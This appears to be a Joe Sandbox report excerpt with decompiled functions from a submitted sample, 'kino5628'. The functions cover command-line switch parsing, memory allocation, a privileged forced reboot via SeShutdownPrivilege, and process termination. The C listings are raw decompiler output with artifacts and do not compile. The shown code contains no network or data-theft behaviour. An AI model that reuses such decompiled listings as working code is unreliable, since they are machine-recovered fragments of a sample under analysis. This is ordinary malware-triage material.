Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: bbe90c1db97010b79bdd1025fc06e20e68f5778b789aeaf9489a1ab393dc254d
Instruction ID: 67e65b079e7093a9dc73cab0247ab4381dde6d056084f0995aadf328ba704ac2
Opcode Fuzzy Hash: bbe90c1db97010b79bdd1025fc06e20e68f5778b789aeaf9489a1ab393dc254d
Instruction Fuzzy Hash: 84F0FE31600B8CDE47618E7A8C00756BBE4FAD53603101A2AA47ED3190DB71A451EB91

Uniqueness

Uniqueness Score: -1.00%

Function 008E66AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008E66AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x008e66b1
0x008e66ba
0x008e66c7
0x008e66bc
0x008e66be
0x008e66be

APIs

GetFileAttributesA.KERNELBASE(?,008E4777,?,008E4E38,?), ref: 008E66B1

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 929b0034ed4576ff04a1a075bcf4a15f44f8b5c76279f95298f46f5fe291c3a5
Instruction ID: e9c1936bed889d5d2dd6bd68c9a05d85d3a28728d653484fcbab216eaa051e00
Opcode Fuzzy Hash: 929b0034ed4576ff04a1a075bcf4a15f44f8b5c76279f95298f46f5fe291c3a5
Instruction Fuzzy Hash: FEB09276232880826A241632AC695563841F6E263A7E92B90F032C01E0DA3ED956D004

Uniqueness

Uniqueness Score: -1.00%

Function 008E4CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008E4CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x008e4caa
0x008e4cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 008E4CAA

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 98da7308d9ad5f4fe5957d05edbf9da5a214ad3cf5db82622dbc0bb8ea691b14
Instruction ID: 7af3af4e82b3949d3060e6be3264aec054ca1c3c138d878c5bca3a49502cfcb8
Opcode Fuzzy Hash: 98da7308d9ad5f4fe5957d05edbf9da5a214ad3cf5db82622dbc0bb8ea691b14
Instruction Fuzzy Hash: 22B0123304424CF7CF001FC2EC09F853F5DF7C4B61F150000F60C490508A72A5108696

Uniqueness

Uniqueness Score: -1.00%

Function 008E4CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008E4CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x008e4cc8
0x008e4ccf

APIs

GlobalFree.KERNELBASE ref: 008E4CC8

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 6624c0adcb374f385d4b63a443764640d3a10f9ae9ac06a18857a3f47ca23b9f
Instruction ID: 67c85518f7e755f86cee4118e1e3710a1c8a6849d4a80a3c75c0ef1082e12386
Opcode Fuzzy Hash: 6624c0adcb374f385d4b63a443764640d3a10f9ae9ac06a18857a3f47ca23b9f
Instruction Fuzzy Hash: A1B0123100014CF78F001B42EC088453F5DE6C06707000010F50C450218B33A8118585

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 008E5C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E008E5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x8e8004; // 0xaf179a30
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E008E6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E008E6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x8e8004; // 0xaf179a30
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E008E597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E008E44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x8e9124 = E008E6285();
									_t75 = 0;
								}
								return E008E6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E008E44B9(0, 0x521, 0x8e1140, 0, 0x40, 0);
												_t85 =  *0x8e8588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E008E667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E008E667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E008E5C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E008E1680(0x8e8c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E008E667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E008E667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x8e8a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E008E5C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x8e8b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x8e8a3a;
																}
																E008E1680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E008E658A(_t218, 0x104, 0x8e1140);
																if(E008E31E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x8e8a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x8e8a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x8e8a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x8e8a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x8e8a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x8e9a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x8e9a2c =  *0x8e9a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x8e8d48 =  *0x8e8d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x8e9a2c =  *0x8e9a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x8e9a2c =  *0x8e9a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x8e8d48 =  *0x8e8d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x8e9a2c =  *0x8e9a2c | 0x00000004;
																										L70:
																										 *0x8e8a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x8e9a2c = 3;
																	 *0x8e8a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x8e8a2c != 0 &&  *0x8e8b3e == 0) {
						if(GetModuleFileNameA( *0x8e9a3c, 0x8e8b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E008E66C8(0x8e8b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x008e5c9e
0x008e5ca9
0x008e5cb0
0x008e5cb3
0x008e5cb6
0x008e5cb7
0x008e5cb8
0x008e5cbd
0x008e6204
0x008e5ccb
0x00000000
0x008e5ccb
0x008e5cd3
0x008e5cd7
0x008e5cf4
0x00000000
0x008e5cf4
0x008e5cf8
0x008e5d00
0x00000000
0x008e5d06
0x008e5d06
0x008e5d0e
0x008e5d10
0x008e5d12
0x008e5d14
0x008e5d15
0x008e5d17
0x008e5d49
0x00000000
0x00000000
0x00000000
0x00000000
0x008e5d19
0x008e5d19
0x008e5d1d
0x00000000
0x008e5d3f
0x008e5d3f
0x008e5d4b
0x008e5d4b
0x008e5d4f
0x008e5d8d
0x00000000
0x008e5d93
0x008e5d93
0x008e5d9a
0x008e5d9d
0x008e5d9e
0x00000000
0x008e5d9e
0x008e5d51
0x008e5d5b
0x008e5d72
0x008e60fb
0x008e60fb
0x008e6207
0x008e620a
0x008e620b
0x008e620e
0x008e6217
0x008e5d78
0x008e5d78
0x008e5d80
0x008e5d83
0x008e5d84
0x00000000
0x008e5d84
0x008e5d5d
0x008e5d5f
0x008e5d62
0x008e5d68
0x008e5d64
0x008e5d64
0x008e5d64
0x00000000
0x008e5d62
0x008e5d5b
0x008e5d4f
0x008e5d1d
0x00000000
0x008e5d9f
0x008e5d9f
0x008e5da5
0x008e5dab
0x008e5dba
0x008e6218
0x008e621d
0x008e6220
0x008e6221
0x008e6229
0x008e6230
0x008e6247
0x008e626a
0x008e6272
0x008e6249
0x008e6255
0x008e625f
0x008e6264
0x008e6264
0x008e6284
0x008e5dc0
0x008e5dc0
0x008e5dca
0x008e5e22
0x00000000
0x00000000
0x00000000
0x00000000
0x008e5dcc
0x008e5dce
0x008e5e24
0x008e5e24
0x008e5e2c
0x008e5e47
0x008e5e4a
0x008e61d2
0x008e61e2
0x008e61e7
0x008e61ee
0x008e61f1
0x008e61f1
0x008e61f8
0x008e61f8
0x008e5e50
0x008e5e53
0x008e6109
0x008e611f
0x00000000
0x008e6125
0x008e6137
0x008e613a
0x008e613c
0x008e613e
0x008e613e
0x008e6141
0x008e6141
0x008e6143
0x008e6144
0x008e614a
0x00000000
0x008e6150
0x008e6152
0x008e615c
0x008e6170
0x008e6172
0x008e617c
0x008e6190
0x008e6190
0x008e6196
0x008e61a5
0x00000000
0x008e61ab
0x008e61b9
0x008e61c6
0x008e61c6
0x008e617e
0x008e6180
0x008e618a
0x00000000
0x00000000
0x00000000
0x00000000
0x008e618a
0x008e615e
0x008e6160
0x008e616a
0x00000000
0x00000000
0x00000000
0x00000000
0x008e616a
0x008e615c
0x008e614a
0x008e610b
0x008e610e
0x008e610e
0x00000000
0x008e5e59
0x008e5e59
0x008e5e5c
0x008e604f
0x008e6056
0x00000000
0x008e605c
0x008e606e
0x008e6071
0x008e6073
0x008e6075
0x008e6075
0x008e6078
0x008e6078
0x008e607a
0x008e607b
0x008e6081
0x00000000
0x008e6087
0x008e6087
0x008e608d
0x008e609c
0x00000000
0x008e60a2
0x008e60aa
0x008e60b2
0x008e60b7
0x008e60bd
0x008e60bf
0x008e60bf
0x008e60d6
0x008e60e0
0x008e60e7
0x008e60f5
0x00000000
0x00000000
0x00000000
0x00000000
0x008e60f5
0x008e609c
0x008e6081
0x008e5e62
0x008e5e62
0x008e5e65
0x008e5fd3
0x008e5fe9
0x00000000
0x008e5fef
0x008e5fef
0x008e5ff7
0x008e5ffd
0x008e6003
0x008e6006
0x008e6011
0x008e6014
0x008e603d
0x008e6016
0x008e6018
0x008e6019
0x008e601b
0x008e6033
0x008e601d
0x008e6020
0x008e6029
0x008e6022
0x008e6022
0x008e6022
0x008e6020
0x008e601b
0x008e6042
0x008e6044
0x008e6046
0x008e604a
0x008e5ff7
0x008e5fd5
0x008e5fd8
0x008e5fd8
0x00000000
0x008e5e6b
0x008e5e6b
0x008e5e6e
0x008e5f8b
0x008e5f99
0x00000000
0x008e5f9f
0x008e5fa7
0x008e5faf
0x00000000
0x008e5fb1
0x008e5fb3
0x00000000
0x008e5fb5
0x008e5fb7
0x00000000
0x008e5fb9
0x00000000
0x008e5fb9
0x008e5fb7
0x008e5fb3
0x008e5faf
0x008e5f8d
0x008e5f8d
0x008e5f8d
0x008e5f8f
0x008e5fc1
0x008e5fc1
0x008e5fc1
0x00000000
0x008e5e74
0x008e5e74
0x008e5e77
0x008e5ea0
0x008e5ebd
0x008e5f79
0x00000000
0x008e5f7f
0x008e5ec3
0x008e5ec3
0x008e5ecc
0x008e5ed4
0x008e5ed6
0x008e5edc
0x008e5edf
0x008e5eea
0x008e5eed
0x008e5f3f
0x008e5f40
0x00000000
0x008e5eef
0x008e5eef
0x008e5ef2
0x008e5f34
0x008e5ef4
0x008e5ef4
0x008e5ef7
0x008e5f2b
0x00000000
0x008e5ef9
0x008e5ef9
0x008e5efc
0x008e5f22
0x00000000
0x008e5efe
0x008e5eff
0x008e5f02
0x008e5f16
0x008e5f04
0x008e5f07
0x008e5f0d
0x008e5f46
0x008e5f46
0x008e5f09
0x008e5f09
0x008e5f09
0x008e5f07
0x008e5f02
0x008e5efc
0x008e5ef7
0x008e5ef2
0x008e5f4c
0x008e5f4e
0x008e5f50
0x008e5f54
0x008e5ed4
0x008e5ea2
0x008e5ea4
0x008e5eaf
0x008e5eaf
0x00000000
0x008e5e79
0x008e5e7d
0x00000000
0x008e5e83
0x008e5e83
0x008e5e83
0x008e5e85
0x008e5e85
0x008e5e8e
0x00000000
0x008e5e94
0x00000000
0x008e5e94
0x008e5e8e
0x008e5e7d
0x008e5e77
0x008e5e6e
0x008e5e65
0x008e5e5c
0x00000000
0x00000000
0x00000000
0x008e5dd0
0x008e5dd0
0x008e5dd0
0x00000000
0x008e5dd0
0x008e5dce
0x008e5dca
0x008e5dba
0x00000000
0x008e5d00
0x008e5dd9
0x008e5e04
0x008e61fe
0x008e5e0a
0x008e5e0c
0x008e5e17
0x008e5e17
0x008e5e04
0x008e6200
0x008e6200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 008E5CEE
GetModuleFileNameA.KERNEL32(008E8B3E,00000104,00000000,?,?), ref: 008E5DFC
CharUpperA.USER32(?), ref: 008E5E3E
CharUpperA.USER32(-00000052), ref: 008E5EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 008E5F6F
CharUpperA.USER32(?), ref: 008E5FA7
CharUpperA.USER32(-0000004E), ref: 008E6008
CharUpperA.USER32(?), ref: 008E60AA
CloseHandle.KERNEL32(00000000,008E1140,00000000,00000040,00000000), ref: 008E61F1
ExitProcess.KERNEL32 ref: 008E61F8

Strings

RegServer, xrefs: 008E5F66
", xrefs: 008E612D
", xrefs: 008E5D78
:, xrefs: 008E6118

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: 64f6f68f75ee3b973254cc8834439b763199dfe8cc2e0f5c739c96cf1eb35f52
Instruction ID: 8c2bcfcc20a51d470c464cd1a91682800e4e413fecd1c97fddd5f367107b7d5f
Opcode Fuzzy Hash: 64f6f68f75ee3b973254cc8834439b763199dfe8cc2e0f5c739c96cf1eb35f52
Instruction Fuzzy Hash: 6DD14F71A04ED99EDF358B3B8C487B93761FB2734CF5441B9D4C6D6191EA708E868B01

Uniqueness

Uniqueness Score: -1.00%

Function 008E1F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E008E1F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x8e9a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x8e8004; // 0xaf179a30
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E008E44B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E008E6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E008E44B9(0, 0x522, 0x8e1140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E008E1EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x008e1f90
0x008e1f90
0x008e1f93
0x008e1f98
0x008e1fa4
0x008e1fa7
0x008e1fc5
0x008e1fcd
0x008e1fdb
0x008e1ee5
0x008e1eea
0x008e1ef1
0x008e1ef4
0x008e1f0c
0x008e1f2e
0x008e1f3a
0x008e1f46
0x008e1f4d
0x008e1f58
0x008e1f60
0x008e1f61
0x008e1f62
0x008e1f75
0x008e1f80
0x008e1f77
0x008e1f77
0x00000000
0x008e1f77
0x008e1f64
0x008e1f64
0x00000000
0x008e1f64
0x008e1f0e
0x008e1f0e
0x008e1f13
0x008e1f13
0x008e1f14
0x008e1f14
0x008e1f16
0x008e1f17
0x008e1f1a
0x008e1f1f
0x008e1f1f
0x008e1f86
0x008e1f8f
0x008e1fcf
0x008e1fd3
0x00000000
0x008e1fd3
0x008e1fa9
0x008e1fb4
0x008e1fbb
0x008e1fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x008e1fc3
0x008e1f9a
0x008e1f9a
0x008e1fa2
0x008e1fd9
0x008e1fda
0x00000000
0x00000000
0x00000000
0x008e1fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 008E1EFB
OpenProcessToken.ADVAPI32(00000000), ref: 008E1F02
ExitWindowsEx.USER32(00000002,00000000), ref: 008E1FD3

Strings

SeShutdownPrivilege, xrefs: 008E1F28

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: 0093ff0b24775aeb13227043837a3f58fff8608675c6eddaa0d58e58bb5d44ab
Instruction ID: 73b818c07c4e024a5390bdc24b4503735c3cd7cc516bc13520d334cae826a59f
Opcode Fuzzy Hash: 0093ff0b24775aeb13227043837a3f58fff8608675c6eddaa0d58e58bb5d44ab
Instruction Fuzzy Hash: 3521A871B40285AADF205BA69C4EF7F76B8FB86B15F100019FA06D6181DB74980196A6

Uniqueness

Uniqueness Score: -1.00%

Function 008E6CF0 Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008E6CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x008e6cf7
0x008e6d00
0x008e6d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,008E6E26,008E1000), ref: 008E6CF7
UnhandledExceptionFilter.KERNEL32(008E6E26,?,008E6E26,008E1000), ref: 008E6D00
GetCurrentProcess.KERNEL32(C0000409,?,008E6E26,008E1000), ref: 008E6D0B
TerminateProcess.KERNEL32(00000000,?,008E6E26,008E1000), ref: 008E6D12

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

